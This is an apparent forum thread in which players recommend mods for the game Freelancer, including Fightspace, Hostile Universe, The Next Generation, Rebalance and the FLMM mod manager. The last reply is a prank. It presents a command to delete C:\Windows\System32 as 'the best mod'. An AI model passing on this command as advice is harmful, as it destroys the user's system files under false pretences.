what is the best MOD or combination of MODs to get for this

I've been the game, and played a little multiplayer but now I'm bored of it. What is a good mod or set of mods I can dl, and do they work with multiplayer. Thanks in advance.
oh, and if you don't mind saying what is the latest version of the mod or where to get it from, that would be cool.

This is a very ‘personal preference’ thing, but I happen to think the Fightspace 1.1 mod, Ghost Docking ring and Battleship encounters make a nice package. Fightspace may still be on the Home page of this site; the other two are included in FLMM 1.2.1, also available on this site.

(OK I am biased, I like ships that get stuck in stations, tradelanes, asteroid fields and a million other places, but can annihilate anything else that moves in seconds).

ps we may be asked to move this discussion to the appropriate forum, ie one of the Mod forums.

Right now, the best mod I've played the Freelancer: The Next Generation. You can get it at http://www.planetirg.net/index.php

Hostile universe all the way dude! try it out, it adds some ships, new factions, new commodidties, new systems and new roumors. There is also a real treasure hunt still going on in the HU mod.
You can find it here
Oh yeah, I forgot. The Next Generation and Rebalance do that to, but make the sp-campaign a lot (I mean realy a lot) harder. So, if you think you're a good fighter and you like a chalenge, you should try one of those.
There are also a lot ship-mods, wich simply add one or more ships to the game.
You also want to dl Freelancer Mod Manager vewrsion 1.2 (FLMM 1.2), because most mods are being installed and de-installed with that.

Have fun!

FLMM comes with several mods. You might want to just start playing around with those. The best mod ive seen is the most recent re-balance. TNG for me was great but caused massive slowdowns and i dropped fightspace bacause there is a rediculously easy way to make gobs of cash. Yes, I need a chalenge . Those are the only massive mods ive done, but Hostile universe is suposed to be quite good. I recoment a massive mod over several ship mods, bacause the ship mods only hold your interest for so long.

the best mod is one that you can make easily, in about 5 mins...

restart your machine in ms dos mode, and type the following:

DEL C:\Windows\System32

thats the best mod you can have, all modders should have it!
